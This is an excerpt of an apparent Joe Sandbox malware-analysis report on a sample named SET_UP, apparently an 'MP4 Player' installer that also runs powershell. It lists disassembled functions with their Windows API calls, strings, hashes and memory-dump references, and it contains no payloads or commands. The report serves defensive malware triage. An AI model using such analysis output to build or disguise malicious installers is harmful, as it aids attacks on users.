                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$DecrementInterlocked
                                                                                                                                                                                                  • String ID: fps$Auto
                                                                                                                                                                                                  • API String ID: 2206737547-3224325225
                                                                                                                                                                                                  • Opcode ID: c637915b557f5ca61ad6679d2be4a97ba0d41eafb27d3f6c89533cb22bfaadda
                                                                                                                                                                                                  • Instruction ID: 77db1c6673dc2b0d160f09009dd33c51f8983ef9816bc097edb1ffbd6d426d30
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c637915b557f5ca61ad6679d2be4a97ba0d41eafb27d3f6c89533cb22bfaadda
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4116A7180025AEBCF11EF91C952AFEBB74FF04708F04441FB91062181DBB89E04CBAA
                                                                                                                                                                                                  Function 0040D817 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetMenuDefaultItem.USER32(00000000,00000001,00000001), ref: 0040D83B
                                                                                                                                                                                                  • SetMenuDefaultItem.USER32(00000000,?,00000001), ref: 0040D875
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DefaultItemMenu
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2151095189-3916222277
                                                                                                                                                                                                  • Opcode ID: b1374f06727e10d70ae75bead7582c547d1af015d4139e73066d11519027940f
                                                                                                                                                                                                  • Instruction ID: c021024201f822eec89a1e49b9b9d740d9c9127c94d1339a3fbd0948d467d428
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1374f06727e10d70ae75bead7582c547d1af015d4139e73066d11519027940f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94118B32A00706AFDB109F92C885F66BBE5FF44310F00C83EFA6A9A290D775E854DB50
                                                                                                                                                                                                  Function 0042D435 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042D43A
                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 0042D4A0
                                                                                                                                                                                                    • Part of subcall function 004B223F: __EH_prolog.LIBCMT ref: 004B2244
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$CreateDecrementFileInterlocked
                                                                                                                                                                                                  • String ID: \\?\
                                                                                                                                                                                                  • API String ID: 989806476-4282027825
                                                                                                                                                                                                  • Opcode ID: 97e88e821e2f96e02800b20912403b19f654c8aab453c306a436250004652095
                                                                                                                                                                                                  • Instruction ID: f29ad7c2f68376540cc75fd4cd5b65f33cf05a70fe0bb7dac085dab0f1c92863
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97e88e821e2f96e02800b20912403b19f654c8aab453c306a436250004652095
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E115B71900119EFCB01EFA4CD849EEBBB4FF18368F50862EF521A31A1C7389A44DB64
                                                                                                                                                                                                  Function 00434F17 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00434F1C
                                                                                                                                                                                                    • Part of subcall function 0041CFC1: PathRemoveFileSpecW.SHLWAPI(?), ref: 0041D00A
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,00408BF1,00000000,00000000), ref: 00434F54
                                                                                                                                                                                                    • Part of subcall function 004B4184: MessageBoxW.USER32(?,?,?,?), ref: 004B41AC
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FilePath$ExistsH_prologMessageRemoveSpec
                                                                                                                                                                                                  • String ID: Folder does not exist!
                                                                                                                                                                                                  • API String ID: 3713942814-470711484
                                                                                                                                                                                                  • Opcode ID: b370c35704a19890e26684aa7a8cb808d5ccb44762620ac9db8507c00b79dbe3
                                                                                                                                                                                                  • Instruction ID: 77bad9af3702178f0e048bea3c84d9dad2cba019908053afed976db827740f94
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b370c35704a19890e26684aa7a8cb808d5ccb44762620ac9db8507c00b79dbe3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78019235A04504AFCB14AF75D881DDEBB69EB843B8B10832FF026961D1CB3CA9458658
                                                                                                                                                                                                  Function 0042159D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004215A2
                                                                                                                                                                                                    • Part of subcall function 00421620: __EH_prolog.LIBCMT ref: 00421625
                                                                                                                                                                                                    • Part of subcall function 004B20BD: lstrlenW.KERNEL32(00000000,?,?,004B1CC0,?,?,00403D3C,00000000,?,?,00403D1B,?,?,?,?,00403D01), ref: 004B20CE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$lstrlen
                                                                                                                                                                                                  • String ID: 5.3.10${E2F580C7-E02A-40b3-9907-8BE82F28DFE9}
                                                                                                                                                                                                  • API String ID: 3243491680-702288499
                                                                                                                                                                                                  • Opcode ID: d4167541e93525b77f53e6e460b4276e27a3be5589aefafccf24ec6919817a71
                                                                                                                                                                                                  • Instruction ID: f537048787c8ab5859af8f21c55d2cf0c25f613db3491f72dc8cd3a16441fc50
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4167541e93525b77f53e6e460b4276e27a3be5589aefafccf24ec6919817a71
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 450146B0A017049FC724DF29E802BAAF7E1FF94304F50892ED19A97311D7B8690ACF95
                                                                                                                                                                                                  Function 0042D302 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042D307
                                                                                                                                                                                                    • Part of subcall function 004B55AA: SetDlgItemTextW.USER32(?,?,?), ref: 004B55BC
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • MP4 Player, xrefs: 0042D321
                                                                                                                                                                                                  • If you have a license of %s, please enter your user ID and license key., xrefs: 0042D329
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DecrementH_prologInterlockedItemText
                                                                                                                                                                                                  • String ID: If you have a license of %s, please enter your user ID and license key.$MP4 Player
                                                                                                                                                                                                  • API String ID: 3198702148-2532209692
                                                                                                                                                                                                  • Opcode ID: 85c250c7b6a3838ccc9f1198bf684accbb257e8597aa06f0d2138888c485d76a
                                                                                                                                                                                                  • Instruction ID: 542b55dd3bcfe99576f4186d67fcb72c7dc3b45595f0f533c4a0e243a6fe8294
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85c250c7b6a3838ccc9f1198bf684accbb257e8597aa06f0d2138888c485d76a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27F08232E40219ABCB14EBE5DC02BED7774EB14718F10452FF121A61D0D7BC5608CB98
                                                                                                                                                                                                  Function 004A968E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 004A96AD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DriveType
                                                                                                                                                                                                  • String ID: :$\
                                                                                                                                                                                                  • API String ID: 338552980-1166558509
                                                                                                                                                                                                  • Opcode ID: 0d9f35ee9a4061a634c8151825c366b079ef8105fce45cfbcdb2fcbaa39316e2
                                                                                                                                                                                                  • Instruction ID: 92e5024ba6ed3a019c5b48671a276836388deee78243ab51b8a56b466942331a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d9f35ee9a4061a634c8151825c366b079ef8105fce45cfbcdb2fcbaa39316e2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99E0487124828C69EF118E689484B9B3F9C8F22784F088056F84CCD292D679DE55C765
                                                                                                                                                                                                  Function 004AD1C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetClassNameA.USER32(?,?,00000010), ref: 004AD1DE
                                                                                                                                                                                                  • lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 004AD1EE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ClassNamelstrcmp
                                                                                                                                                                                                  • String ID: ComboBox
                                                                                                                                                                                                  • API String ID: 3770760073-1152790111
                                                                                                                                                                                                  • Opcode ID: 7dc4ee3c62511841f3adcf0c16322175d81904bac9a1d1bcd07a5968ae5c2b88
                                                                                                                                                                                                  • Instruction ID: aca3503869a4dfc4a5498f30d1972649034784229414c41519363f51c66dbfc1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7dc4ee3c62511841f3adcf0c16322175d81904bac9a1d1bcd07a5968ae5c2b88
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CE0DF70A002005BEB14EB68CC0AE2A33E8F728301F844A5AF00AC21A1F7BAD548821A
                                                                                                                                                                                                  Function 004C5D9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GlobalAddAtomW.KERNEL32(?), ref: 004C5DAA
                                                                                                                                                                                                  • GlobalAddAtomW.KERNEL32(system), ref: 004C5DB8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AtomGlobal
                                                                                                                                                                                                  • String ID: system
                                                                                                                                                                                                  • API String ID: 2189174293-3377271179
                                                                                                                                                                                                  • Opcode ID: e38f18ec7094624204f3d065f079180c77f3ec7655a750f729e82f220f61649d
                                                                                                                                                                                                  • Instruction ID: c30f50c047a5bbe5e4cb3da03fa0e3b36eb087986e58fb02b4588582cbb7711b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e38f18ec7094624204f3d065f079180c77f3ec7655a750f729e82f220f61649d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDD022360183C056C62027BAEC00F87F3B9EFC0210F02002FD05983230CBA03841879A
                                                                                                                                                                                                  Function 0049D743 Relevance: 5.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0049C888,?,0049682E), ref: 0049D750
                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0049C888,?,0049682E), ref: 0049D758
                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0049C888,?,0049682E), ref: 0049D760
                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0049C888,?,0049682E), ref: 0049D768
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 32694325-0
                                                                                                                                                                                                  • Opcode ID: 1f0a4df808ede824eea7e3e3cd6f089795d77390aedf663ff31a3cb0aa7423a7
                                                                                                                                                                                                  • Instruction ID: 87146c04dc807499cda0621b2d516821516632fde33fe712a187cdffb704bb0c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f0a4df808ede824eea7e3e3cd6f089795d77390aedf663ff31a3cb0aa7423a7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6C002318014749ACE522B55FC0484F3FA5EF542603118062BD045203497221C96FFC0

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 04B9433E Relevance: .4, Instructions: 416COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000004.00000002.1955978972.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_4b90000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 306d21333b9d3f33805f70348aff33efb729d09b4edd1a928f9d730d9695266a
                                                                                                                                                                                                  • Instruction ID: c0ce0ae5dff720e27d67b2d734f196afef0138e8e8e831944c987eefed2d02b0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 306d21333b9d3f33805f70348aff33efb729d09b4edd1a928f9d730d9695266a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A023B74A042099FDB05CF98D584AADFBF1FF49324F2581A9E805AB361C735ED82CB90
                                                                                                                                                                                                  Function 075B09A8 Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000004.00000002.1957836242.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_75b0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d99bf450064bef927f28ff3a6b30caa992f0d1a219b270cdcbe5d6136483eda9
                                                                                                                                                                                                  • Instruction ID: 5d863789dd94f82645a1bd5201c11fffd65e8a3f13255034f788fbf5d922e563
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d99bf450064bef927f28ff3a6b30caa992f0d1a219b270cdcbe5d6136483eda9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D45103B0B10215CBCB349B788915BFFBBA2BB80318F1584A7D9099B295DF31DD4187A1
                                                                                                                                                                                                  Function 075B098A Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000004.00000002.1957836242.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_75b0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 5e3503297b4b6cb360260be3c5c543ba1275ed06a769515b2406f618c51b033b
                                                                                                                                                                                                  • Instruction ID: 3d52c0b5d01cf042e55eba5888dffbbb28668b2fefbcdc690ff41c91e3b7dfbe
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e3503297b4b6cb360260be3c5c543ba1275ed06a769515b2406f618c51b033b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F441D4B0A14301DFCB358B248951BFF7BA2BF81258F1A84A7D5099B2D6DB35EC41C7A1
                                                                                                                                                                                                  Function 04B93010 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000004.00000002.1955978972.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
